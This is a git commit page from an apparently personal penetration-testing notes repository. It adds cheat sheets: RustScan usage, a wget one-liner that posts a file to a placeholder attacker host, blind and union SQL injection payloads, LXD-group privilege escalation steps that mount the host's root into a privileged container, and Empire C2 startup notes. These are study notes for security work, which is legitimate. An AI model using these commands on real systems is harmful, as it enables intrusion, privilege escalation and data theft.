whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

added stuff

This commit is contained in:
Stefan Friese 2021-09-24 00:54:18 +02:00
parent 7cbcb593a0
commit 3957f28be8
12 changed files with 97 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
.gitmodules vendored
View File

@ -31,3 +31,12 @@
[submodule "exploit/web/php/Chankro"] [submodule "exploit/web/php/Chankro"]
path = exploit/web/php/Chankro path = exploit/web/php/Chankro
url = https://github.com/TarlogicSecurity/Chankro.git url = https://github.com/TarlogicSecurity/Chankro.git
[submodule "enumeration/enumeration"]
path = enumeration/enumeration
url = https://github.com/digininja/CeWL.git
[submodule "enumeration/CeWL"]
path = enumeration/CeWL
url = https://github.com/digininja/CeWL.git
[submodule "enumeration/RustScan"]
path = enumeration/RustScan
url = https://github.com/RustScan/RustScan.git

1
enumeration/CeWL Submodule

@ -0,0 +1 @@
Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d

1
enumeration/RustScan Submodule

@ -0,0 +1 @@
Subproject commit a444ab66e1d2ce17a3154b7cbe21a221bad97e30

4
enumeration/docs/cewl.md Normal file
View File

@ -0,0 +1,4 @@
# Cewl
* Wordlist generator from website
* [CeWl repo](https://github.com/digininja/CeWL.git)

14
enumeration/docs/rustscan.md Normal file
View File

@ -0,0 +1,14 @@
# Rustscan
* [Rustscan repo](https://github.com/RustScan/RustScan)
* Config at `$HOME/.rustscan_scripts.toml`
## Usage
```sh
rustscan -r ports -a <Target-ip> -- <nmap cmds>
```
* Using nmap parameters
```sh
rustscan -a 127.0.0.1 -- -A -sC
```

1
enumeration/enumeration Submodule

@ -0,0 +1 @@
Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d

7
exfiltration/linux/wget.md Normal file
View File

@ -0,0 +1,7 @@
# POST via wget
## Usage
Send file via wget
```
sudo wget --post-file=<fileToExfiltrate> http://<attacker-IP>:<attacker-Port>
```

15
exploit/sqli/sqli.md
View File

@ -34,12 +34,22 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
### Blind injection // Guessing characters ### Blind injection // Guessing characters
```sh ```sh
http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
```
```sh
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
``` ```
* Function substr(string, start, length) * Function substr(string, start, length)
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` * sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
### Union based ### Union based
* _First method__ check by order until error occurs
```sql
' order by 1 -- -
' order by 2 -- -
' order by 3 -- -
```
* __Second method__ fuzzing NULL values, followed by fuzzing data types
* Check number of cols * Check number of cols
```sql ```sql
' UNION SELECT NULL-- ' UNION SELECT NULL--
@ -78,6 +88,9 @@ id=(SELECT banner FROM v$version) # oracle
``` ```
* sqlite specific * sqlite specific
```sql ```sql
' UNION SELECT sql, sql FROM sqlite_master -- -
```
```sql
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable') (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') (SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
``` ```

0
misc/docker_sec/dive → misc/level3_hypervisor/docker_sec/dive
View File

0
misc/docker_sec/docker.md → misc/level3_hypervisor/docker_sec/docker.md
View File

32
misc/level3_hypervisor/lxc.md Normal file
View File

@ -0,0 +1,32 @@
# LXC
## Privilege Escalation
### Member of lxd Group
* [Hackingarticles article](https://www.hackingarticles.in/lxd-privilege-escalation/)
* User has to be in `lxd` group, not necessarily `sudo`.
#### Usage
* Clone and build
```sh
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builde && sudo && ./build alpine
```
* Upload to target
* Import alpine image
```sh
lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage
```
* Prepare image
```sh
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
```
* Host `/` is mounted at `/mnt/root` inside the container
* `root` directory is at `/mnt/root/root`

19
post_exploitation/docs/empire.md
View File

@ -1,11 +1,20 @@
# Empire C2 # Empire C2
## Parts * [Empire Repo](https://github.com/BC-SECURITY/Empire.git)
* Listeners
* Stagers, payloads generated, for example a reverse, delivery mechanism for agents
* Agents
* Modules use through agents
## Start Client and Server
```sh
poetry run python empire --server --rest --notifications
poetry run python empire.py client
```
## Parts
* __Listeners__ receive connections from stagers
* __Stagers__ payloads generated, for example a reverse, delivery mechanism for agents
* __Agents__ remote on target device tasks
* __Modules__ use modularized payload on agents
* __Credentials__
* __Report__ information on devices
* Results are stored in a DB * Results are stored in a DB